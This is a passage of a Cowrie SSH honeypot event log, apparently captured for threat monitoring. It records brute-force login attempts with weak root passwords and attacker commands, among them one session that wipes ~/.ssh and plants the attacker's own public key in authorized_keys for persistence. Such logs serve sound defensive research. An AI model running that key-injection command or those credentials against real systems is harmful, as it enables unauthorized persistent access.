{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:05.496860Z","src_ip":"217.72.205.35","session":"308387295176"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33060,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1f9a631021c","protocol":"ssh","message":"New connection: 217.154.1.158:33060 (1.2.3.4:22) [session: c1f9a631021c]","sensor":"my-vps","timestamp":"2025-08-26T20:06:06.701244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:06:06.702993Z","src_ip":"217.154.1.158","session":"c1f9a631021c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:06:06.719890Z","src_ip":"217.154.1.158","session":"c1f9a631021c"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:06:06.764437Z","src_ip":"217.154.1.158","session":"c1f9a631021c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:06:06.863662Z","src_ip":"217.154.1.158","session":"c1f9a631021c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:06:06.864424Z","src_ip":"217.154.1.158","session":"c1f9a631021c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:06.879588Z","src_ip":"217.154.1.158","session":"c1f9a631021c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:06.880540Z","src_ip":"217.154.1.158","session":"c1f9a631021c"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51624,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0ae3e411d7f","protocol":"ssh","message":"New connection: 217.154.1.158:51624 (1.2.3.4:22) [session: b0ae3e411d7f]","sensor":"my-vps","timestamp":"2025-08-26T20:06:24.196753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:06:24.197772Z","src_ip":"217.154.1.158","session":"b0ae3e411d7f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:06:24.213766Z","src_ip":"217.154.1.158","session":"b0ae3e411d7f"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-26T20:06:24.270460Z","src_ip":"217.154.1.158","session":"b0ae3e411d7f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:25.289473Z","src_ip":"217.154.1.158","session":"b0ae3e411d7f"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39334,"dst_ip":"1.2.3.4","dst_port":22,"session":"abab0edbbd59","protocol":"ssh","message":"New connection: 217.154.1.158:39334 (1.2.3.4:22) [session: abab0edbbd59]","sensor":"my-vps","timestamp":"2025-08-26T20:06:41.767599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:06:41.768562Z","src_ip":"217.154.1.158","session":"abab0edbbd59"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:06:41.782689Z","src_ip":"217.154.1.158","session":"abab0edbbd59"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:06:41.838420Z","src_ip":"217.154.1.158","session":"abab0edbbd59"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:06:41.884060Z","src_ip":"217.154.1.158","session":"abab0edbbd59"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:06:41.884913Z","src_ip":"217.154.1.158","session":"abab0edbbd59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:41.900311Z","src_ip":"217.154.1.158","session":"abab0edbbd59"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:41.901987Z","src_ip":"217.154.1.158","session":"abab0edbbd59"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":36330,"dst_ip":"1.2.3.4","dst_port":22,"session":"04e3a7ffa3ec","protocol":"ssh","message":"New connection: 199.195.248.191:36330 (1.2.3.4:22) [session: 04e3a7ffa3ec]","sensor":"my-vps","timestamp":"2025-08-26T20:06:56.286312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:06:56.290318Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:06:56.381509Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.login.success","username":"root","password":"123456Ti","message":"login attempt [root/123456Ti] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:06:56.742632Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:06:57.003105Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:06:57.003823Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:06:57.004562Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:57.104270Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:06:57.370729Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T20:06:57.371545Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T20:06:57.466042Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:57.467079Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":36910,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f6866ee4c52","protocol":"ssh","message":"New connection: 199.195.248.191:36910 (1.2.3.4:22) [session: 8f6866ee4c52]","sensor":"my-vps","timestamp":"2025-08-26T20:06:57.551779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:06:57.560156Z","src_ip":"199.195.248.191","session":"8f6866ee4c52"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:06:57.645716Z","src_ip":"199.195.248.191","session":"8f6866ee4c52"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T20:06:58.008097Z","src_ip":"199.195.248.191","session":"8f6866ee4c52"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.100859Z","src_ip":"199.195.248.191","session":"8f6866ee4c52"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":37558,"dst_ip":"1.2.3.4","dst_port":22,"session":"a85dc3a124a7","protocol":"ssh","message":"New connection: 199.195.248.191:37558 (1.2.3.4:22) [session: a85dc3a124a7]","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.185773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.187751Z","src_ip":"199.195.248.191","session":"a85dc3a124a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.279556Z","src_ip":"199.195.248.191","session":"a85dc3a124a7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":48744,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dcf2dc31985","protocol":"ssh","message":"New connection: 217.154.1.158:48744 (1.2.3.4:22) [session: 2dcf2dc31985]","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.315860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.317403Z","src_ip":"217.154.1.158","session":"2dcf2dc31985"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.331666Z","src_ip":"217.154.1.158","session":"2dcf2dc31985"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.378988Z","src_ip":"217.154.1.158","session":"2dcf2dc31985"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.650125Z","src_ip":"199.195.248.191","session":"a85dc3a124a7"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.741213Z","src_ip":"199.195.248.191","session":"04e3a7ffa3ec"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:06:59.742107Z","src_ip":"199.195.248.191","session":"a85dc3a124a7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:07:00.395460Z","src_ip":"217.154.1.158","session":"2dcf2dc31985"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:07:04.022079Z","src_ip":"212.227.125.160","session":"f32623555653"}
{"eventid":"cowrie.session.closed","duration":180.16435313224792,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:07:04.026928Z","src_ip":"212.227.125.160","session":"f32623555653"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":37556,"dst_ip":"1.2.3.4","dst_port":22,"session":"6942af35a88d","protocol":"ssh","message":"New connection: 217.154.1.158:37556 (1.2.3.4:22) [session: 6942af35a88d]","sensor":"my-vps","timestamp":"2025-08-26T20:07:16.923873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:07:16.924697Z","src_ip":"217.154.1.158","session":"6942af35a88d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v0